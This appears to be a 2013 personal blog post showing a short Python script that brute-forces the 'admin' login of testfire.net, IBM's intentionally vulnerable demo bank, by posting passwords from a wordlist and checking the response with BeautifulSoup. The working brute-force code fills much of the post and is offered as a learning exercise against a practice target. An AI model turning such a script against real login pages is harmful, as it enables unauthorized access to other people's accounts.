Tuesday, October 1, 2013

My lazy attempt towards python! #BeautifulSoup #Requests

Inspired by the amazing null humla session that I attended I thought of writing my own simple login-brute-force in python using requests. There are a lot of brute-forcing scripts in the market but I thought of writing my own.
I love the Requests library for python, as the author says "Its HTTP for Humans" it actually is. I really encourage using this library at least once if one wants to start learning python web scraping.
I have also used BeautifulSoup library to extract few HTML tags. The website which I have used is http://www.testfire.net, which is a vulnerable bank application developed by IBM for web app testing.
The script is used to brute force all possible passwords against a single user name "admin". I initially tried writing it with cookiejar but some how the code got little lengthier but then Requests came to my rescue.
The script opens a file called 'password.txt' containing a list of random passwords to brute force. In this case the correct password is "admin", with Requests library it is possible to intercept the request in a proxy before hitting the server. Here I am running a proxy on port 8082 just to see the data what my script is sending.Feel free to use the script (for learning purpose only), here is the gist link.

#Author: Prajal Kulkarni
import requests
import sys
from bs4 import BeautifulSoup as BS


proxyDict = {"http":"127.0.0.1:8082"}

url = "http://www.testfire.net/bank/login.aspx"

def connect(url,m):
    t = requests.post("http://www.testfire.net/bank/login.aspx", data=m, proxies=proxyDict)
    print t.text
    soup = BS(t.text)
    a=soup.find('a', id="_ctl0__ctl0_Content_AccountLink")
    x = str(a.string)
    print x
    if x == "MY ACCOUNT" :
        print "The pass is" + " " + m['passw']
        sys.exit()
    else:
        print "Password %s not working" %m['passw']

def controller():
    m = {}
    f=open('password.txt','r').read().split('\n')
    for line in f:
          m["uid"] = "admin"
          m["passw"] = str(line)
          m["btnSubmit"] = "Login"
          print m
          connect(url,m)

controller()



4 comments: